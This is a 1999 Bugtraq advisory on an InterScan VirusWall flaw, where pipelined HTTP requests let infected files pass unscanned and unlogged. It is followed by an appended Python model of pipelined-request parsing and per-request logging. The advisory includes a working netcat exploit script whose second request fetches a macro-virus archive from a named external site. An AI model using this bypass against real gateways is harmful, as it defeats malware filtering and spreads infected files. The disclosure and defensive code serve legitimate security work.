Bugtraq mailing list archives

BlackHats Advisory -- InterScan VirusWall


From: unicorn () BLACKHATS ORG (The Unicorn)
Date: Mon, 22 Feb 1999 21:31:51 +0100


                         BlackHats Security Advisory


           Release date: February 22, 1999
            Application: InterScan Viruswall for Solaris
               Severity: Any user can download binaries and virus
                         infected files through the VirusWall

              Author(s): s10 () blackhats org, unicorn () blackhats org

---
Overview:
---

        InterScan VirusWall  is part of Trend  Micro's integrated family
of virus protection  products that covers every access  point - Internet
gateways,  groupware,  e-mail and  intranet  servers,  LAN servers,  and
desktops. InterScan VirusWall  scans inbound and outbound  SMTP mail and
attachments, FTP and HTTP traffic  in real time. It automatically cleans
infected files and detects malicious Java applets and ActiveX objects.

        When two HTTP GET requests are combined in one message, of which
the former points to a non-scanned file like a graphic image (e.g. a GIF
file) and the latter to a possibly infected binary or macro file, both of
the files are passed to the user requesting the data without any warning
or logging by the VirusWall. We found that this combination was sometimes
generated by well-known web browsers like Netscape Communicator and
Microsoft Internet Explorer during normal use.

        We informed  Trend Micro of  this vulnerability more  than three
weeks  ago. We  fully described  the  problem to  Trend Engineering  and
included an exploit  similar to the one described below  and all traffic
between the  browser and VirusWall, but  did not receive a  fix for this
problem. The explanation received was that they were unable to reproduce
it on  their systems.  Since these  systems are  used to  protect people
behind (expensive)  firewall configurations against virus  infection, we
decided to make, at least, the  administrators of these systems aware of
this exploit  that can be  used by  users behind an  InterScan VirusWall
configuration to circumvent the implemented security policy.

---
Affected systems:
---

        InterScan VirusWall for Solaris
        Implementations of InterScan VirusWall on other platforms are
        likely to be vulnerable, but were not tested since we do not have
        them available.

---
Workarounds/Fixes:
---

        We have  not yet received  a fix from  Trend Micro. It  might be
possible  to close  this  hole by  scanning *ALL*  data  passed in  HTTP
traffic, but  this will have a  negative influence on the  throughput of
the complete firewall configuration.

---
Example:
---

        We developed the following exploit that requests two files in one
message. The first one is a simple graphic file (in this case from the
Trend Micro web-site) and the second one is a file containing a well-known
macro virus, which would normally be detected and removed by the product.
Using the netcat tool we send this combined request out to the world using
the VirusWall as a proxy server. The information received back is stored
in a file. When later examining the file we find both the graphic and the
virus-infected contents requested. Looking through the logfiles, no trace
is found of this file seeping through the hole.

#!/bin/sh
# Two HTTP/1.0 GET requests are sent back to back on one connection to the
# VirusWall proxy (host "viruswall", port 80); everything returned is saved
# to the.results for later inspection.
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

" | nc viruswall 80 > the.results

        Changing the second part of this "code" will enable downloading
any information through the Trend Micro InterScan VirusWall, probably
because the product only acts on the first GET command in a message while
retrieving all of the information requested.
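The behaviour described above, as an added example that is not part of the advisory and not Trend Micro code: a small Python model of what a scanning proxy sees on one client connection. It splits a raw request buffer into the individual pipelined requests (folding a wrapped Accept header of the kind browsers of the time sent), then compares the "first request only" inspection the advisory hypothesises with the workaround of inspecting every request, and emits one log line per request so a second GET can never pass through unlogged. The sample stream, the host example.invalid, the UNSCANNED_SUFFIXES list and the connection id are constructed assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Tuple


class Request(NamedTuple):
    method: str
    url: str
    version: str
    headers: Dict[str, str]


REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (HTTP/\d\.\d)$")

# Assumption for this model: file types a content filter treats as harmless
# and passes through unscanned (the advisory's "non-scanned" GIF case).
UNSCANNED_SUFFIXES = (".gif", ".jpg", ".jpeg", ".png")

# Constructed sample with the shape of the advisory's request: two GETs on
# one connection, the first for an image and the second for an archive.
SAMPLE_STREAM = (
    "GET http://example.invalid/images/logo.gif HTTP/1.0\r\n"
    "Host: example.invalid\r\n"
    "Accept: image/gif, image/jpeg,\r\n"
    " image/png, */*\r\n"
    "\r\n"
    "GET http://example.invalid/files/sample.zip HTTP/1.0\r\n"
    "Host: example.invalid\r\n"
    "\r\n"
)


def split_pipelined_requests(raw: str) -> List[Request]:
    """Parse every request in the buffer, not only the first one.

    HTTP/1.0 GET requests carry no body, so each request ends at the first
    empty line. A header line starting with whitespace continues the
    previous header (a folded Accept line).
    """
    requests: List[Request] = []
    lines = raw.replace("\r\n", "\n").split("\n")  # accept CRLF or bare LF
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line.strip():
            continue  # blank separator between requests (or trailing)
        m = REQUEST_LINE.match(line)
        if m is None:
            raise ValueError(f"malformed request line: {line!r}")
        method, url, version = m.groups()
        headers: Dict[str, str] = {}
        last = None
        while i < len(lines) and lines[i] != "":
            h = lines[i]
            i += 1
            if h[0] in " \t" and last is not None:
                headers[last] += " " + h.strip()  # folded continuation
            elif ":" in h:
                name, value = h.split(":", 1)
                last = name.strip().lower()
                headers[last] = value.strip()
            else:
                raise ValueError(f"malformed header line: {h!r}")
        requests.append(Request(method, url, version, headers))
    return requests


def scan_decisions(requests: List[Request], first_only: bool) -> List[Tuple[str, bool]]:
    """Return (url, scanned) per request.

    first_only=True models the behaviour the advisory hypothesises: only the
    first request on the connection is inspected, so a harmless first file
    lets every later file through. first_only=False models the workaround
    of inspecting every request on the connection.
    """
    decisions = []
    for idx, req in enumerate(requests):
        considered = (idx == 0) if first_only else True
        harmless_type = req.url.lower().endswith(UNSCANNED_SUFFIXES)
        decisions.append((req.url, considered and not harmless_type))
    return decisions


def audit_log_lines(requests: List[Request], conn_id: str = "conn-1") -> List[str]:
    """One log line per request, plus a warning when a connection carries
    several requests, so a pipelined fetch always leaves a trace."""
    out = [f"{conn_id} req#{n} {r.method} {r.url}" for n, r in enumerate(requests, 1)]
    if len(requests) > 1:
        out.append(f"{conn_id} WARNING {len(requests)} pipelined requests on one connection")
    return out


if __name__ == "__main__":
    reqs = split_pipelined_requests(SAMPLE_STREAM)
    print("first request only:", scan_decisions(reqs, first_only=True))
    print("every request:     ", scan_decisions(reqs, first_only=False))
    print("\n".join(audit_log_lines(reqs)))
```

With first_only=True the archive in the second request is never inspected, which is exactly the gap the advisory describes; with first_only=False it is, at the throughput cost the Workarounds section mentions. The per-connection warning line is the check an administrator would want in the logfiles regardless of which scanning policy is in force.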

---
Further Study:
---

        Further study  of this vulnerability  may focus on FTP  and SMTP
traffic and the detection of malicious Java applets and ActiveX objects.


Ciao,
Unicorn.
--
======= _ __,;;;/ TimeWaster ================================================
     ,;( )_, )~\| A Truly Wise Man Never Plays
    ;; //  `--;     Leapfrog With A Unicorn...
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======


